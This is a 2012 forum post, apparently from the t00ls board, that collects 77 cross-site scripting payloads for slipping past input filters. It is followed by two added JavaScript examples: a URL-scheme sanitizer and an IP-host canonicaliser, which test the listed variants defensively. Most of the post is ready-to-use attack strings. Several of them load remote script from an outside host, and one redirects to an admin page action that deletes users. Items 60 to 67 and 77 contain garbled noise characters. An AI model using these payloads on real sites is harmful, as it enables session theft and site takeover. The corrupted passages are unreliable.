XSS cross-site scripting attack roundup

Posted 2012-9-5 14:56:34
It seems there is not much XSS material on t00ls, so I copied this good stuff over in case any of you want to bookmark it.

(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript directive
<IMG SRC="javascript:alert('XSS');">

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#88;&#83;&#83;&#34;&#41;>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav	ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">

(15) Multi-line injected JavaScript, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters are basically useless domestically, since there is nowhere to exploit them.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters before the JavaScript
<IMG SRC="   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open angle brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escape filter
\";alert('XSS');//

(30) Closing the Title tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE tag (made of an open angle bracket and a name starting with a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE approach
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) Using ActionScript inside Flash you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace. The .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS gets filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command, can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

! p" [: h& ?+ v& D! ]  P* j* } (60)IMG嵌入式命令(a.jpg在同服务器)/ h& o5 G# l& r
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
2 Q0 K$ d5 y9 |2 V. }  @
: a# R8 d8 ~; M' N( T+ J (61)绕符号过滤6 H! s0 J" S( S# r/ h7 v
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
7 A, t* r  a% q1 [& C* }0 B
: B9 g4 B: L. a' { (62)
& g3 p- ?; E8 x <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
) Y  l& B8 M# B, y7 G  h$ a" a! c' J7 ?, n4 S5 n& a% R! s
(63)% g! r# F- B' i% F/ `
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>5 O; Y, Q3 J! r  J" i  g
# w% K6 U' f* b# i; Q& f  E# N
(64)
  K* t. D  w  U! B5 ]* z; ^/ d" w5 Y6 f6 e <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
) C* j1 G0 K5 d
0 _9 J4 D: m2 O. w; |( f (65)
9 {, y$ w& u$ X$ q9 Q( G* o <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>* p" y- B9 _! d0 Y+ }+ L3 `0 c
; A. `* v3 l& @- C9 E( n
(66)
: I" z  c* j# u+ T# p3 t1 w <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
% r# w9 B7 R+ E2 ^) s8 |! C+ ~6 f: P4 F' t* z* }0 j7 F5 V
(67)" Z6 ~5 Y5 @+ ~! L6 ~
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>: l& s" R" g' d8 H

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) Decimal IP
<A HREF="http://3232235521">XSS</A>

(71) Hex IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>

/ t/ M8 c2 [7 H! a( N (77)javascript链接" E2 \2 P% ^8 \+ n+ U/ G4 l
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
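The IMG/A-href vectors in items 3 to 19 and 40 all attack the same weak spot: a filter that looks for the literal string "javascript:" before the browser has decoded character references and stripped whitespace and control characters. The following is an added example, not code from the original post, showing an allowlist-based check on URL-valued attributes that applies the browser's own decoding steps first. The allowed-scheme set, the function names and the sample table are my own assumptions; the samples are constructed from the payload shapes on this list.

```javascript
// Added example, not code from the original post: an allowlist-based check for
// URL-valued attributes (href, src, background, ...) that is not fooled by the
// javascript:-scheme obfuscations above (case changes, numeric character
// references with or without semicolons, embedded tab/LF/CR, NUL bytes,
// leading whitespace). Run with Node.js; no dependencies.

// Assumption: the schemes this site considers acceptable in user-supplied links.
const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);

// Decode numeric character references the way an HTML tokenizer does inside an
// attribute value: decimal or hex, leading zeros allowed, terminating semicolon
// optional (items 5, 8, 9, 10). Named references (&Tab; &NewLine; &colon; ...)
// are not handled here; a real sanitizer must decode those as well.
function decodeNumericRefs(s) {
  return s.replace(/&#(?:[xX]([0-9a-fA-F]+)|([0-9]+));?/g, (_, hex, dec) => {
    const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
    return cp > 0x10ffff ? "\uFFFD" : String.fromCodePoint(cp);
  });
}

// Normalise the way a browser's URL parser does before it reads the scheme:
// strip ASCII tab, LF and CR anywhere in the string (items 11-15), strip NUL
// (items 17, 18) and trim leading/trailing C0 controls and spaces (item 19).
function normalizeUrl(raw) {
  return decodeNumericRefs(raw)
    .replace(/[\t\n\r\0]/g, "")
    .replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, "");
}

// RFC 3986 scheme syntax; schemes compare case-insensitively (item 4).
const SCHEME_RE = /^([a-zA-Z][a-zA-Z0-9+.-]*):/;

// Returns the lowercase scheme, or null for relative / protocol-relative URLs.
function extractScheme(raw) {
  const m = SCHEME_RE.exec(normalizeUrl(raw));
  return m ? m[1].toLowerCase() : null;
}

// Allowlist rather than blocklist: accept relative URLs and known-good schemes,
// reject everything else (javascript:, vbscript:, data:, and anything unreviewed).
function isSafeUrl(raw) {
  const scheme = extractScheme(raw);
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}

// Constructed samples modelled on the vectors above: [attribute value, should be allowed].
const URL_SAMPLES = [
  ["javascript:alert('XSS')", false],                                       // (3)
  ["JaVaScRiPt:alert('XSS')", false],                                       // (4)
  ["&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')", false], // (5)
  ["&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058alert('XSS')", false], // (9)
  ["&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29", false], // (10)
  ["jav\tascript:alert('XSS');", false],                                    // (11)
  ["jav&#x09;ascript:alert('XSS');", false],                                // (12)
  ["jav&#x0A;ascript:alert('XSS');", false],                                // (13)
  ["jav&#x0D;ascript:alert('XSS');", false],                                // (14)
  ["java\0script:alert(\"XSS\")", false],                                   // (17)
  ["   javascript:alert('XSS');", false],                                   // (19)
  ["vbscript:msgbox(\"XSS\")", false],                                      // (40)
  ["data:text/html,<script>alert('XSS')</script>", false],                 // not on the list, still blocked
  ["http://3w.org/XSS/xss.js", true],
  ["//www.google.com/", true],                                              // (74)
  ["/images/logo.png", true],
  ["mailto:user@example.com", true],
];

// Inputs whose verdict disagrees with the expectation; an empty list means every
// variant above was classified correctly.
function findMisclassified(samples = URL_SAMPLES) {
  return samples
    .filter(([url, expected]) => isSafeUrl(url) !== expected)
    .map(([url]) => url);
}

for (const [url] of URL_SAMPLES) {
  console.log(`${isSafeUrl(url) ? "allow" : "block"}  ${JSON.stringify(url)}`);
}
console.log(findMisclassified().length === 0 ? "all samples classified as expected" : "MISMATCH");
```

This covers only the attribute-value class of vectors. The tag-structure tricks (items 20 to 27 and 61 to 67) and the CSS url()/expression vectors (items 39, 46 to 53) are a different problem: they need context-aware output encoding and a real HTML parser, not a regex over the raw markup.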
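Items 70 to 76 work because a host allowlist that compares strings sees "3232235521", "0xc0.0xa8.0x00.0x01", "0300.0250.0000.0001" and "www.google.com." as four unrelated hosts. The following is an added example, not code from the original post, that canonicalises a link's host before comparison using the IPv4 rules of the WHATWG URL Standard (1 to 4 dotted labels; decimal, 0x-hex or leading-zero octal; the last label fills the remaining bytes). The helper names, the expected-host table and the userinfo/port handling are my own assumptions.

```javascript
// Added example, not code from the original post: canonicalising the host of a
// link so that the IP spellings above (decimal, hex, octal, mixed, trailing dot)
// all compare equal to the dotted-decimal form. The parsing rules follow the
// WHATWG URL Standard's IPv4 parser; helper names and the sample table are my own.
// Run with Node.js; no dependencies.

// One dotted label: plain decimal, "0x"-prefixed hex, or leading-zero octal.
// Returns a non-negative integer, or null if the label is not numeric.
function parseIPv4Number(label) {
  if (label === "") return null;
  let radix = 10;
  let digits = label;
  if (/^0[xX]/.test(label)) {
    radix = 16;
    digits = label.slice(2);
    if (digits === "") return 0;            // a bare "0x" counts as zero
  } else if (label.length > 1 && label[0] === "0") {
    radix = 8;
    digits = label.slice(1);
  }
  const valid = { 10: /^[0-9]+$/, 16: /^[0-9a-fA-F]+$/, 8: /^[0-7]+$/ }[radix];
  return valid.test(digits) ? parseInt(digits, radix) : null;
}

// Parse an IPv4 host written as 1 to 4 numeric labels; the last label supplies
// all remaining bytes, so "3232235521" and "192.168.1" are both valid. Returns
// the canonical dotted-decimal string, or null if the host is not an IPv4 address.
function parseIPv4Host(host) {
  const labels = host.split(".");
  if (labels.length > 1 && labels[labels.length - 1] === "") labels.pop(); // "1.2.3.4."
  if (labels.length < 1 || labels.length > 4) return null;
  const nums = labels.map(parseIPv4Number);
  if (nums.some((n) => n === null)) return null;
  const tailBytes = 5 - nums.length;                 // bytes covered by the last label
  for (let i = 0; i < nums.length - 1; i++) if (nums[i] > 255) return null;
  if (nums[nums.length - 1] >= 256 ** tailBytes) return null;
  let value = 0;
  for (let i = 0; i < nums.length - 1; i++) value = value * 256 + nums[i];
  value = value * 256 ** tailBytes + nums[nums.length - 1];
  // Arithmetic rather than >> : the value can exceed the signed 32-bit range.
  return [24, 16, 8, 0].map((shift) => Math.floor(value / 2 ** shift) % 256).join(".");
}

// Pull the host out of an href without a URL library, so the raw spelling stays
// visible: scheme://host or //host, dropping userinfo and port. IPv6 literals
// are out of scope for this example.
function hrefHost(href) {
  const m = /^(?:[a-zA-Z][a-zA-Z0-9+.-]*:)?\/\/([^/?#]*)/.exec(href.trim());
  if (!m) return null;
  let authority = m[1];
  const at = authority.lastIndexOf("@");
  if (at !== -1) authority = authority.slice(at + 1);
  return authority.replace(/:[0-9]*$/, "");
}

// Canonical host for allow/deny-list comparison: lowercase, drop the trailing
// "absolute DNS" dot (item 76), rewrite any IPv4 spelling as dotted decimal.
function canonicalHost(host) {
  let h = host.toLowerCase();
  if (h.endsWith(".")) h = h.slice(0, -1);
  return parseIPv4Host(h) ?? h;
}

// True when the link's host, after canonicalisation, is the host you expect.
function linkPointsTo(href, expectedHost) {
  const host = hrefHost(href);
  return host !== null && canonicalHost(host) === canonicalHost(expectedHost);
}

// Constructed samples modelled on items 70-76: [href, host it really resolves to].
const HOST_SAMPLES = [
  ["http://3232235521", "192.168.0.1"],                 // (70) decimal
  ["http://0xc0.0xa8.0x00.0x01", "192.168.0.1"],        // (71) hex
  ["http://0300.0250.0000.0001", "192.168.0.1"],        // (72) octal
  ["http://66.000146.0x7.147/", "66.102.7.147"],        // (73) mixed, whitespace removed
  ["//www.google.com/", "www.google.com"],              // (74) scheme-relative
  ["http://www.google.com./", "www.google.com"],        // (76) absolute DNS
  ["http://user:pw@192.168.0.1:8080/admin", "192.168.0.1"],
];

// Samples whose canonical host does not match; empty means the normaliser
// handled every spelling above.
function findMismatches(samples = HOST_SAMPLES) {
  return samples.filter(([href, host]) => !linkPointsTo(href, host)).map(([href]) => href);
}

for (const [href] of HOST_SAMPLES) {
  console.log(`${href}  ->  ${canonicalHost(hrefHost(href))}`);
}
console.log(findMismatches().length === 0 ? "all hosts canonicalised as expected" : "MISMATCH");
```

In production code the platform URL parser already applies these IPv4 rules (in Node, `new URL("http://3232235521/").hostname` returns "192.168.0.1"), so compare canonical hosts taken from a real parser rather than from the raw attribute string; the hand-written parser here is to make visible what each spelling on this list resolves to.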